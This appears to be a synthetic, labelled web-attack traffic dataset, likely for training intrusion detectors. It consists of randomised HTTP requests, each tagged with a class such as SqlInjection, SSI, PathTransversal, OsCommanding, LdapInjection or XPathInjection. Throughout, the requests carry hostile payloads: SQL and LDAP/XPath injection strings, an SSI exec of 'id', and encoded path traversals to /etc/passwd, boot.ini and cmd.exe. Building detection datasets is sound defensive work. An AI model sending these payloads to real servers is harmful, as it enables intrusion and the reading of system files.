Transfer-Encoding: xhada; oUlhts7t=tam8
Upgrade: EutP9q/0.0, tvoa/2.5, adr7m/4.2, mmn/1.2, egg2x/1.5
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46385
Start - Id: 42292
class: SqlInjection
GET /sIdIvTW006STJms/l56XJvglXL0/onlihc7tc8miThuu/9bgmtoillsbetiiRy/2weXy1X0ll_EF/iQV/ogG9qk6/TzhEKacceptq/ttbahiebvslrztee/enr6sc52eepNTttaT6i/ltaslf16oelnmuatptr.asp?8srgidT=28700007&eogUumyeiw7swse=%27select+customer_phone+++%27%7C%7C%27from+++++customers+++++%27%7C%7C%27where+++++customer_surname%3D%27%27%27%7C%7C+lv_surname%7C%7C%27%27%27+++++and++customer_type%3D1%27%3B HTTP/1.0
Host: 165.175.217.196
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: euc-tw;q=0.5
Accept-Encoding: compress;q=0.1, gzip
Accept-Language: ttegoc-3t;q=0.1, leete-bned, qiskhy-6acntd3;q=0.9, o1hm-s, nsfcty-vep;q=0.1
Cache-Control: no-cache
Client-ip: 87.181.200.43
Cookie: csTJees=ms nandfT$passwdoet rIhE;Ee0hoe=h0UiFFJ1;ia5tl=oA1vcTLjQ6Vr
Cookie2: $Version="095"
Date: Sun, 31 Oct 04 04:56:29 UTC
ETag: W/"17F1n2q6q2So7mxf"
Expect: 100-continue
From: 8eae@aimsslc7.net
If-Modified-Since: Wed, 23 Dec 09 16:13:25 UTC
If-Unmodified-Since: Sun, 23 Nov 08 07:12:04 UTC
If-Match: "79N6weC8TiNHylJR"
If-None-Match: *
If-Range: Sun, 20 Apr 08 14:07:00 UTC
Max-Forwards: 544
MIME-Version: 2.3
Pragma: eih='6uK'
Proxy-Authorization: NTLM c2NTYTJ1bDV3emVlZXlUZWV0ZHJhZXR5ZHJiN2dlaWNvY2ZTaWhlZW9ybWNq
Authorization: tusE HcFen=tbiuae
Range: -568889,-588214
Referer: http://www.bdswngs.ch/erpmaI5/5euoaim/nnn1xep.asmx
TE: trailers,deflate,trailers
Trailer: Trailer
User-Agent: tlrEwepndI (l7K4z-3Z; 9sp2_qFjt; 0iFDiLs3)
UA-CPU: 68000
UA-Disp: 695,8049,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 443x7648
Via: HTTP/8.4 www.h8eedaq1.tiff:5411, 1.9 www.ahdeanUe.gif:400
Transfer-Encoding: compress
Upgrade: lr2rr/2.7, aetd/1.2, tei/7.3, tgOeft/0.3, Ozehbn/5.9
Warning: 539 www.diea.jpeg "Aotyhee" "Sun, 01 Feb 09 21:46:05 GMT"
X-Forwarded-For: 41.19.144.81
X-Serial-Number: 0737501888973
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42292
Start - Id: 40219
class: SSI
POST /taonirgCI/eaIO1@hr4/mtuegtlegt/tWN0jURImochaPitelnet/oJPlMVUzYV_R/f6Ni4m8D.r/9jVaQ6pXAXexecfSK/G4DOD6PlHC_/s2tjrjEin2z/iz/a_-q-96Kagvicojf.sh? HTTP/1.1
Content-Length: 151
Content-Language: tenisP
Content-Encoding: identity
Content-Location: /hesa4t/qiar0sb/ITiedpl.pl
Content-MD5: b3BoOHBPNm5kYW5lZWJnYw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Jul 04 03:47:36 GMT
Host: www.cmcgS.be
Connection: close
Accept: video/quicktime;q=0.8, text/xml;q=0.1, text/*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.0, identity, compress
Accept-Language: *;q=0.0
Cookie: sovne1wEt7v=refcopyg;ge9swn8p=<!    #<!--  #exec    cmd="id"-->;tmpVVhtpass7yal=ro5Xjk;qdpaiEcfoalAsif=36061;peouiNoiaruxo=779;ea=nx i=ect p=Ue/tsr
Date: Tue, 19 Jun 07 03:13:28 GMT
If-None-Match: *
Max-Forwards: 4266
Pragma: no-cache
Referer: http://www.uuit.ch/xzcoae.zip
TE: trailers,gzip;q=0.7,deflate;q=0.0
User-Agent: zoben/1.7.3.3
Transfer-Encoding: deflate

de8hhtwi=5&ohcd65s5owa=do@EU-&lfhetnekqcloe=htpassmnulleiti&m53=09&iahceedgsNheopt=:p&qthiisir=ueaeralu@nsH&GCOeJj-=ot1_W_RDkim_&wrehliosddlhe=so

End - Id: 40219
Start - Id: 45775
class: PathTransversal
GET /kOsCreplace_lpiba6ywW/n7fuhZKTmy.l7r644./d5o09qfiaa5sdrt/d2j@6Yt5_UzkhD-r/noto9rFtni5/rarush/ete/uu67hetgiwmehafE.php4?so7fagae=htmaebe6uieFdne&ldwI=%5CWINDOWS%5Csystem.ini&St@GLZS=phpen%25if&Rl=vs%3Bs%5Dmgd65a+ise HTTP/1.1
Host: 130.7.196.194
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-ce, x-mac-arabic, x-mac-korean;q=0.6
Accept-Encoding: 
Accept-Language: mNtAswi-e47wt2d;q=0.7, etoseblD-0q3lrs, eroon-klni, 81uwdd-P1ro6i;q=0.6, a-ra
Cache-Control: no-cache
Client-ip: 79.240.194.64
Cookie: iTiabtrmh=sw3yrD;turh9rincludes;nhssle=hwioalili
Cookie2: $Version="815"
Date: Wed, 31 Mar 04 17:13:56 UTC
ETag: "o-Sve-wo4yNnUq.x7"
Expect: iinlwiyi=0scnai;nte9=ye1nacA4
From: a3y5m@itfi.st
If-Modified-Since: Thu, 21 Jan 10 23:48:41 GMT
If-Unmodified-Since: Fri, 30 May 08 15:08:07 GMT
If-Match: *
If-None-Match: "D8ZJiNloG2M0lLIgu"
If-Range: *
Max-Forwards: 091
MIME-Version: 2.4
Pragma: rOn='tywwyea'
Proxy-Authorization: nE0np rioae=tsisa
Authorization: Basic RThtbjpldDllZUl1aQ==
Range: 61230-1,22438-
Referer: http://0sOle.biz/enheorr/amteo7/elInr/1anxesid/crpeet.gz
TE: chunked;q=0.9,trailers,trailers
Trailer: Accept-Charset
User-Agent: 7o17ed/0.3.2
UA-CPU: StrongARM
UA-Disp: 4288,202,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 3390x940
Via: 4.6 www.reectr.html:58555, 1.9 221.113.92.153, Us0hti/2.6 www.lws4rOA.jpeg
Transfer-Encoding: identity
Upgrade: 2na/4.7, nhstv/0.2, eb7/4.5, slNply/4.7
Warning: 712 www.oljITEeh.gif "uxn4he4amitIWjRw" "Sun, 25 Apr 04 03:24:53 GMT"
X-Forwarded-For: 46.216.57.172
X-Serial-Number: 726601184
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45775
Start - Id: 43717
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.mlat.be
Connection: scedo
Accept: audio/*;q=0.6, application/x-tar, image/*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: s-dte78e, El-xiei;q=0.1, e2-8, ei-hEt0r, 3Eei9oi-nI
Cache-Control: no-cache
Client-ip: 183.153.88.199
Cookie: do=50804;iweyerclfmdooj=3095
Cookie2: $Version="684"
Date: Mon, 13 Mar 06 19:35:36 UTC
ETag: "WuqeTiXQlvgbu6xrYI"
Expect: 100-continue
From: uhbqiisi@rmieagr.org
If-Modified-Since: Tue, 01 May 07 20:25:46 GMT
If-Unmodified-Since: Mon, 15 Aug 05 11:46:01 CET
If-Match: *
If-None-Match: "2tR4kJ8kRPqfOXfuB1bt"
If-Range: Sat, 16 Feb 08 23:35:21 GMT
Max-Forwards: 064
MIME-Version: 8.9
Pragma: haw3tnnu='g8e6wutu'
Proxy-Authorization: NTLM ZW5rZWVzZTBwY0l1aDdsbHdBMmxhT2VhT2FhNmNkeHRhd2U3bjQ=
Authorization: Basic ZXRpc2U6ZlR4bmw=
Range: 7008-71
Referer: http://Hor3uHbe.net/iioto/lja4np/tfytf/O85rci.asmx
TE: gzip,deflate
User-Agent: btfazrt
UA-CPU: 68000
UA-Disp: 603,315,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5641x613
Via: 3.0 www.osrotoo.jpeg
Transfer-Encoding: mnnhta
Upgrade: fnetaM/4.9, l3e/1.2
Warning: 546 161.55.81.201 "zehnaoi8Htrab7epa" 
X-Forwarded-For: 175.133.115.65
X-Serial-Number: 181822248668347
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43717
Start - Id: 38719
class: LdapInjection
GET /Qe2d/Drmeki0ieaaamnmgo/ypnn7iqi/haknsitRttrhltam/rcooewtmccrduo1a/bRq5xXIFa8FV/enO0ss9eh.mdb?idOj8er7anywc=ubtpaibIsshQ5lt&ptqwee3=35484&c0=ict+3o4p&mniDxe0PIpS=tn&ttp9tnrtnrh=jhtansnshbnepan&a6rtti8reelibir=Qhit&mcsgiaeec8=41&eoaint=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&MimgCVtmVjv8=eF6XMBns1YrV&3e524uxa60elq=8icced%25&xauDH-Bmlm=aEbetween&emnufehwhht=qn&htmDdartDststy=kt%3Dlmm HTTP/1.0
Host: 96.180.164.151:80
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 95.161.31.177
Cookie: CBZHwexec=zR9HK9ZA-;akfyaldcreTf2g=724370837;6s8iuR=136;54WstshH=dznxzw;pEcv=01731
Cookie2: $Version="8"
Date: Mon, 26 Nov 07 13:02:27 GMT
ETag: W/"NFQTVepJm2oQTAnAc-"
Expect: 100-continue
From: ilrb@h5ihiwr.cz
If-Modified-Since: Thu, 18 Feb 10 18:29:19 UTC
If-Unmodified-Since: Wed, 24 Mar 10 12:48:46 CET
If-Match: "hBO3-EiL@.CCvD1PA@HY"
If-None-Match: "cJno@Uj23fjxIs1"
If-Range: *
Max-Forwards: 9
MIME-Version: 3.7
Pragma: 8teer3pr='nhI'
Proxy-Authorization: Digest algorithm=pssp
Authorization: Basic ZHlpZXQ6dHQ3YW53YQ==
Range: 5873-
Referer: http://www.ttDt.ch/3eer6gbe/cstwdiut/dlaj7ps.jsp
TE: trailers
Trailer: If-Range
User-Agent: i3apeoueer/4.7.1.1
UA-CPU: 68000
UA-Disp: 281,271,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 094x3377
Via: HTTP/4.4 www.nezexm.shtml:07099
Transfer-Encoding: gzip
Upgrade: uau3/2.9
Warning: 792 57.164.145.223:2 "o6u6iwaenei" "Thu, 08 Oct 09 12:11:05 UTC"
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 0697506678006
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38719
Start - Id: 37957
class: LdapInjection
GET /tciqlRBsfbROGqEPb0wi/ao.mdb?msoi0Tinse=azY_nCt_Epvu&dfxDLhrsystem=eH%40M5ekKs&u4=a+&dr9t4rtAuiernE6=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&ff=aoto4ie&entfsi9H9lwsws=aynfjU&2iebbtsrt=547&crebt=83561300&owalnlgrieT=%40sl%25x%5D&h5orbDWdXX=txyx HTTP/1.0
Host: www.Av7ie.st
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.3
Cache-Control: max-stale=1416
Client-ip: 106.160.89.209
Cookie: zh=eSsaqWdr0y3  ;dnrnLwqqglaeet8=f zptaahsecowr;noesuAz=937263;Iebeii=woa;eiOintla4l=ed;atles=Hdnoanie
Cookie2: $Version="39"
Date: Sun, 11 Dec 05 22:34:07 UTC
ETag: W/"AMXW7dHrAGf@J@P3v-"
Expect: psersns=esanan
From: nteal@6riIt.fr
If-Modified-Since: Thu, 31 May 07 12:33:49 CET
If-Unmodified-Since: Tue, 18 Jul 06 23:11:30 GMT
If-Match: "zuCPuCjPYUsijsXd7C8d"
If-None-Match: "C@brXdppUgnX0.Jws.CG"
If-Range: "_ca5UBQDF7Ac8kaj"
Max-Forwards: 0
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: NTLM aXJoenJoN2NpbmdpZnJoY0t0bHNkZW9pc3lkaGI2ZGQ=
Authorization: ndeT l2ftnt=toae
Range: 80461-
Referer: http://em5d.cz/oahso/et6S/edrerp/oeRisy/nmUv.htm
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/1.1 (X11; U; Linux i386 9.1; ii-u1; rv:6.0.1) Gecko/71991435
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: 3.4 227.238.161.80:3, 8.1 2.242.230.209
Transfer-Encoding: compress
Upgrade: meng/6.1, eFlrhd/9.3, 8sNla/8.7
Warning: 700 www.fia1N.gif "guys2ngneaoLs2joonsi" "Fri, 30 Dec 05 15:06:31 CET"
X-Forwarded-For: 36.237.252.182
X-Serial-Number: 8812591
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37957
Start - Id: 48922
class: XPathInjection
GET /iVlCimNxkrBUK/hhrveIIeitaont1/kposyOyX53zlaosw47P/ak9W8.3nA8.gif?sntytaisom4oa=a%28fqs&ftaci2Ieerdanoh=%28i+++%3C++count%28d6%2Fchild%3A%3Atext%28%29%29+++++and+++j+++%3C+count%28aos%2Fchild%3A%3Acomment%28%29%29+++and+++k++%3C+++count%28amt%2Fchild%3A%3A*%29+++++%29 HTTP/1.1
Host: www.esOozoto.gov:80
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-age=5964
Client-ip: 187.187.151.241
Cookie: N1n@Ve=6482081;tf5wd=ouwsvo
Cookie2: $Version="99"
Date: Sat, 14 Feb 04 14:25:52 GMT
ETag: "hw9wQLkPBeLy3h12jYG"
Expect: 100-continue
From: adatne4h@font.be
If-Modified-Since: Tue, 25 Jan 05 05:11:28 CET
If-Unmodified-Since: Mon, 17 Nov 08 12:39:03 UTC
If-Match: *
If-None-Match: "LAHK2WdNQcm60qvLzQG9"
If-Range: "Ad@kEKKeND1Ur7a.W"
Max-Forwards: 8
MIME-Version: 7.0
Pragma: egtel='awitr'
Proxy-Authorization: Digest response="f4fa2C3be9dCA3EBbB36Ea92bAdd9Da1"
Authorization: NTLM dWVlaGlUcmRldW9zZTRzZXQ5N0l0dGoxa25icGVkb3RUb2F1Y2M1Tw==
Range: 1264-
Referer: http://www.isaikict.st/twnq9h.asmx
TE: gzip;q=0.7,trailers,gzip;q=0.4
Trailer: Host
User-Agent: Mozilla/4.5 (Machintosh; U; PPC 5.4; i7-ea; rv:4.5.1) Gecko/20534916
UA-CPU: PowerPC
UA-Disp: 9230,4281,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 508x349
Via: 0.5 www.eiWt9ls.css:1, 6.0 www.aset.css:7, FTP/3.4 135.56.67.62
Transfer-Encoding: deflate
Upgrade: nh8h/9.9, eweeTf/0.2
Warning: 893 27.190.237.63 "taIazhQdsogaUn5mo" 
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 90589069814400492161
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48922
Start - Id: 39792
class: SSI
GET /ostdinKlegroup by7/o.VnbY/Z@Hlj/hfuatIga7/W4xstdin6T3n4OHE.L3/2u@rY_Pk7dHVGdzW/bnfVS./bodyP0h2Z/4tsmex/9xsdhevihei7tb07.jpeg?neilEvd7s6f=beLrt&cr=n&delseoidhez4I=vn-PgRduIp&aitbxEr0hude=n+w%7C+a%24HelhcqOt3&mehEiisihnmp=nrdflh&0ncrretomtFlyed=361&bHADh=spyic9874RAtV&aregK=9052412&8ocehifeeh=%283rE&oyraoSInh=89&ls2whDthi=wls0eeualn0Tr&2neseutou2mv=2&formjfDobjectd4qshutdownLk8=oPtsio3donawo7he&innisPlleluetiv=%3C%21--+++++%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+--%3E&6rtEwoeya=+%3Dws8l%29catie1tin HTTP/1.1
Host: 105.53.206.109
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.5
Cache-Control: max-stale=9410
Client-ip: 129.26.179.125
Cookie: me=hnhitaaaselect;heneiia7tatbial=ns@YYrNu;nr=4404926;xik=o2GvR0c3pPxH;sznrreiahho=0dlEr
Cookie2: $Version="9"
Date: Mon, 15 Nov 04 16:14:32 CET
ETag: W/"Ne7FULYkvbu.-BWNg_8"
Expect: 100-continue
From: otit3le@ijlhneot1o.com
If-Modified-Since: Fri, 19 Aug 05 12:26:28 GMT
If-Unmodified-Since: Sat, 25 Apr 09 15:44:44 GMT
If-Match: "bHJKkxda8xbD6vUFfSP"
If-None-Match: "QkGjakNT_idqLCD_P@U"
If-Range: Mon, 14 Feb 05 17:45:30 UTC
Max-Forwards: 0174
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest nc=Ca5d26eD
Authorization: Digest realm
Range: 538-81062,0-593619
Referer: /Ttrn/e1estnt/nxhhhel/d5hathsk/tnzhQ2.cfm
TE: gzip;q=0.7,trailers,gzip
Trailer: Upgrade
User-Agent: rhDs (luon1sxiX@; 7FWiHVPt)
UA-CPU: Sparc
UA-OS: Solaris
UA-Pixels: 468x7869
Via: FTP/6.0 215.151.212.70:91, rtht/0.8 www.i62dn3.jpg
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
X-Forwarded-For: 203.248.148.225
X-Serial-Number: 39977076241136
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39792
Start - Id: 42155
class: SqlInjection
GET /9ihlaHhac2s5ti/e.YcJD3_blvZrp5a/oG1T1J0J/mo0lc3rrgasuushtooew.jsp?n6ir=or++0%3C%3E%28select+++count%28*%29+from+++++eddv%29&gdcIE3OU=lqO&rbaal2Obddmsxe=yhimgm&IzabO=having&iv40apxRgroup byCA=omcne&o1tbi=call+eamrtlmdeleteuniond&2i3tSenvnlroiEa=ispub HTTP/1.1
Host: www.aoga.gov
Connection: noci
Accept: audio/x-wav, image/jpeg, application/zip;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: saemtbs-efc;q=0.4, mosnnd-troey, eu-ptmhcbu
Cache-Control: no-cache
Client-ip: 117.221.83.105
Cookie: hs1a=Se\tr]3l%/;n4L0tyonazpn28=sthdEd84e a;upda=dii;etnc=f;plg5iADUCG=ov3
Cookie2: $Version="18"
Date: Wed, 17 Dec 08 08:15:58 CET
ETag: W/"q9@-@42oTbHORdulE04"
Expect: aho2Bm=aetsd4di;yyd5s
From: tktabU@4ahlq0ig.org
If-Modified-Since: Sun, 29 Jun 08 05:21:08 UTC
If-Unmodified-Since: Mon, 28 Aug 06 18:14:01 UTC
If-Match: "WC_sA9U12wVxJI9ag"
If-None-Match: *
If-Range: *
Max-Forwards: 7633
MIME-Version: 0.7
Pragma: 9Onfeeg='T'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Basic ZWhhYTptY2FubGts
Range: 4781-
Referer: /ascf/blin8t/ulf77d1e/snsb.cgi
TE: deflate,trailers
Trailer: Expect
User-Agent: dAI0oRy http://www.dspoe.be
UA-CPU: StrongARM
UA-Disp: 2259,521,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3499x504
Via: 4.5 www.homphXe.html, HTTP/5.2 www.oanEato.htm:7
Transfer-Encoding: ktfi
Upgrade: cosqd/4.3
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42155
Start - Id: 44100
class: OsCommanding
GET /scripts/georgi.asp/..��..��..��file.ext? HTTP/1.1
Host: 198.21.196.89
Connection: inwsa
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: tm3-Sed9Tnme
Cache-Control: fjzse=yth
Client-ip: 236.2.174.53
Cookie: upr9nlhjo=101;s6=eCa%
Cookie2: $Version="7"
Date: Sat, 26 Dec 09 20:58:25 UTC
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: nvabn6ks@5obcxtres.uk
If-Modified-Since: Sat, 12 Dec 09 08:37:36 GMT
If-Unmodified-Since: Thu, 27 Jan 05 01:37:53 UTC
If-Match: "Uv1ZNf812leJATaD"
If-None-Match: "wTPl-_Xs0Mth8.WxT"
If-Range: Sat, 04 Apr 09 21:41:55 UTC
Max-Forwards: 18
MIME-Version: 0.4
Pragma: cn=aLwhuimn
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: Digest uri=/taeZ9/rhunOa/vnpaf.mspx
Range: 70-
Referer: http://www.TgmBnrgd.be/vmDefya/e3ndao/hotsf0Bi/8eazje6.mspx
TE: deflate;q=0.0
Trailer: If-None-Match
User-Agent: Mozilla/4.1 (compatible; Konqueror/1.6; Linux i386; Nfyanrpo; wMno4plnRi)
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1501x189
Via: HTTP/3.0 135.149.112.57
Transfer-Encoding: gzip
Upgrade: unHis2/9.7, sDw/8.7
Warning: 552 www.5qeog.tiff "0tt4tuzwrsgn" 
X-Forwarded-For: 136.126.27.126
X-Serial-Number: 388289600968011
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44100
Start - Id: 35450
class: SqlInjection
POST /lknytsicim/zL8Vd/CludooSolfienwTsi/e2qvJHKSBuVW/aFmh5nesfslmOhsod6.asmx? HTTP/1.0
Content-Length: 101
Content-Language: dnnbil,fe,dt7
Content-Encoding: deflate
Content-Location: /av6O.fgf
Content-MD5: bGVvdGswRXZsbDkxcmVkNg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Thu, 26 May 05 10:52:11 UTC
Host: 6.78.109.109:80
Connection: keep-alive
Accept: */*
Accept-Charset: koi8;q=0.4, x-mac-ce, windows-1257
Accept-Encoding: *;q=0.4
Accept-Language: '    /**/   OR   /**/  'iiyMaa'   >   'S
Cache-Control: no-transform
Client-ip: 116.153.145.24
Date: Sun, 30 Jan 05 10:15:42 UTC
If-Unmodified-Since: Sun, 01 Feb 09 22:14:06 CET
Max-Forwards: 2
Authorization: NTLM aG5xcW1zY2gxc1JhaWVFM2xhYW1sbnBocmlldW50cm9zeXpuRXN2cG5ldXJ0
Referer: http://iitteIl.org/7ensUa/oefrosm/SWnmr.css
User-Agent: 6ccgsd (iPXGSbi3op; aDIX.fiTi_)
UA-OS: FreeBSD
UA-Pixels: 292x501

wwas=3085&olXwce8weif=67310119&udr=bdeb5u&LofYykPttY=Iie=0yB-s~e@copydo&qrzesvd=atn%l@rbody

End - Id: 35450
Start - Id: 49983
class: XPathInjection
GET /rAfKZfTL3z2X5Jeg8q/aSgi@Jj2S.JxKHm/tosam1ay/ob_OKJp/Oovntu.png?Wv2P=47860&pts6tfe=ofb7&ssnr=2ce5&esoisea1rvf=cxOH0f&O9ncE4telnetblNQ=fEh+cmd&rlaHleofmeat=psS%2FIaTg%2Fa%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D8%5D++or+%27rtip%27++++%3D+++%27&KYnj=iEstylei0sboot.ini&rruikt=estnrratOfMshh&SA0boot.iniO5@p=801&G7B-wTLcBuNY=lkpbinTnhalleynciue&te44ko2=2062&sldO=akGzyI&Iofmna5=glxHGxX0v1Z3&Nwxw4hnsjk=4529510490&pmCq=Ur%27nd5eeh HTTP/1.0
Host: www.36ne.de
Connection: close
Accept: text/xml, application/x-tar
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 202.20.153.136
Cookie2: $Version="372"
Date: Fri, 12 Jun 09 19:57:36 GMT
ETag: W/"o_kvEAaAscQ3k6U"
Expect: etuerprO
From: natfa@epmfst.be
If-Modified-Since: Sun, 11 Oct 09 14:10:00 CET
If-Unmodified-Since: Tue, 29 Nov 05 01:46:08 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 20 Jun 07 12:03:19 GMT
Max-Forwards: 6666
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: lIa6N tRl9n=obihRto
Authorization: NTLM eUNnaWxmTEFzbm9hRTFlaW5lb25sZ3NobGVseHNoc29rbm9k
Range: 30900-
Referer: http://ijaloo9T.de/juaeEib/yeSzrrr/near/sp8a7so/aRo5e.aspx
TE: deflate;q=0.9,deflate
Trailer: User-Agent
User-Agent: ysesni3oet5atpj8c
UA-CPU: 68000
UA-Disp: 1888,408,16
UA-OS: Linux
Via: 4ur/7.0 www.rrhcmn.jpeg:6550, 2.6 125.62.24.218:756
Transfer-Encoding: deflate
Warning: 265 www.raemriNe.tiff "tniraa8ta" 
X-Forwarded-For: 10.220.189.114
X-Serial-Number: 80680664480083663
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49983
Start - Id: 36305
class: PathTransversal
GET /qoYSYzlW7cR1ifU/zxk/hA/u0wEO7hsjXcLni6E/onXallu/3uallVDmXU/yKroHJ6/object7I.jpg?9zq38JTVTV4S=s%28&9tk0yiesat=2527&BoTttelnet8=a-uBwQ&0elo216tehe=sUTR4Xx5D4&roradt2qire=2780294&tdttuhp7h=8407093&hs=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&sofgnet5oa=g4%40yTve&pelcodge=nwt&ydprso=hoT HTTP/1.1
Host: 18.90.56.76:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, identity, gzip, deflate;q=0.7, deflate;q=0.0
Accept-Language: rropwomd-93a;q=0.5, 8em6z-8, nd5-edsdfex;q=0.9, ayuo3-ietdh4fe;q=0.3
Cache-Control: max-stale=7
Client-ip: 145.8.91.154
Cookie: n8oiol4ua=3de-q2tTMq2;soyns0=nteOftpsdbrzti)it
Cookie2: $Version="042"
Date: Sat, 01 Jan 05 23:21:23 GMT
ETag: "PR@C.gH8sSbya5og"
Expect: 100-continue
From: Ai3uSa@urpega.be
If-Modified-Since: Tue, 10 Jun 08 05:44:40 GMT
If-Unmodified-Since: Thu, 29 Dec 05 17:09:05 GMT
If-Match: "QysLfqwJ1kveU1y3"
If-None-Match: *
If-Range: Sun, 05 Mar 06 06:40:29 CET
Max-Forwards: 43
MIME-Version: 7.2
Pragma: sboh='rteeD'
Proxy-Authorization: Basic dWRVMWF0QWg6bnlwc3Q0ag==
Authorization: mr9em ce1x=a9es7s
Range: -3704,-3488,-42683
Referer: http://tmef1E.it/wSia/rauuen3e/hittu/Oe4n.asmx
TE: deflate;q=0.8,deflate,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/0.6 (Windows; U; Windows NT 6.7; Ir-me; rv:8.2.9) Gecko/81215689
UA-CPU: MIPS
UA-Disp: 505,9391,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: 5.8 92.247.3.169:3, 5.9 www.5stae4e.jpg, 2.3 140.214.24.162
Transfer-Encoding: reHno
Upgrade: oafi/4.5
Warning: 925 www.seESe.gif "aoh3bha8hrc" 
X-Forwarded-For: 87.172.119.89
X-Serial-Number: 10989646571343616
----: --------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36305
Start - Id: 45499
class: PathTransversal
GET /2tOnm/nioexe2yyfnannlrhli/uIcj06Zv1wwS5DELF/peotenpnt/bkB.J9cQYMEk4/ftnurn1fdn/oYxLAd/a6bMDgv1zEPUuSNwEWs/8eeosiztll/1N70g2aD9.9V.shtml?LhavingVO=s9o9tear%3B&bjesu5yieth3pn=dustylewd%3BshFbcpnbetweenonhttpwyh&wEoirgutu7dnin=window.openybetweentbti&5eahhniienim=e9LdSO_&epcaimruih=7&eoctf6pie=7%3A%5Cautoexec.bat HTTP/1.1
Host: 144.91.192.208
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-age=388
Client-ip: 165.251.254.128
Cookie: ts3em8isieacyrh=cn1twM;pk=htotT1e2+Di0xmludixh;d0usstoetOr=F/P><loehtftnaa5o%
Cookie2: $Version="629"
Date: Wed, 09 Apr 08 15:37:01 CET
ETag: "SQQiLGzppLASCU-m"
Expect: shtTeapd=s0or6;ewio3=nsoo
From: rddIbt@n7reian.st
If-Modified-Since: Wed, 18 May 05 16:55:13 GMT
If-Unmodified-Since: Sun, 01 May 05 03:29:42 CET
If-Match: *
If-None-Match: "3X65fxKnxeYPp5ve5JV"
If-Range: "WJuNZph3I_LEhQN8"
Max-Forwards: 42
MIME-Version: 4.8
